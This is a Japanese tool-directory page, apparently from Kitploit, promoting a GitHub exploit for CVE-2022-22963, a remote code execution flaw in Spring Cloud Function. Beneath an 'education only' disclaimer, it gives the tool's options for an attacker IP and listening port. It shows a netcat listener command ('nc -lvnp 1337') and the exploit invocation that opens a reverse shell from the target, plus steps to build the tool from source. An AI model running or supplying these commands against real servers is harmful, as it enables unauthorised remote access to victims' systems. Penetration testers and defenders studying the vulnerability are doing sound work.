Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2022-22963 — CVE-2022-22963 用のバイナリ | Kitploit
ツール/GitHubGitHub/gunzf0x/cve-2022-22963
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育リモートアクセスツール
GitHubgunzf0x/cve-2022-22963

CVE-2022-22963

CVE-2022-22963 用のバイナリ

リポジトリを見る
3年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2022-22963

CVE-2022-22963を悪用してSpring Cloudサービスを攻撃するリモートコード実行です。

免責事項:これは教育目的のみです。作者は本プログラムの使用について一切責任を負いません。自己責任で使用してください。

使い方

root@kitploit:~
./CVE-2022-22963 -h


Usage:
  CVE-2022-22963 [OPTIONS]

Application Options:
  -u, --target-url=     Target/Host url where 'Spring Cloud' is running. Example: -t http://somesite.htb
  -p, --target-port=    Port running the service. Example: -p 8080
  -i, --attacker-ip=    Attacker IPv4 Address. Example: -i 10.10.10.10
  -l, --listening-port= Listening port to connect. Example: -l 1337

Help Options:
  -h, --help            Show this help message

脆弱性の可能性があるターゲットが http://somerandomserver.com:8080 で実行されていると仮定します。nc をポート 1337 で待ち受けさせ、nc -lvnp 1337 を実行します。次に、スクリプト/エクスプロイトを実行します:

root@kitploit:~
./CVE-2022-22963 -u http://somerandomserver.com -p 8080 -i 10.10.10.10 -l 1337 

ソースからビルドする

マシンに go がインストールされている場合は、次のように実行します:

root@kitploit:~
git clone https://github.com/GunZF0x/CVE-2022-22963.git
cd CVE-2022-22963
go run main.go -h #run without compiling any file
go build -o exploit main.go #build the file
ツールをダウンロード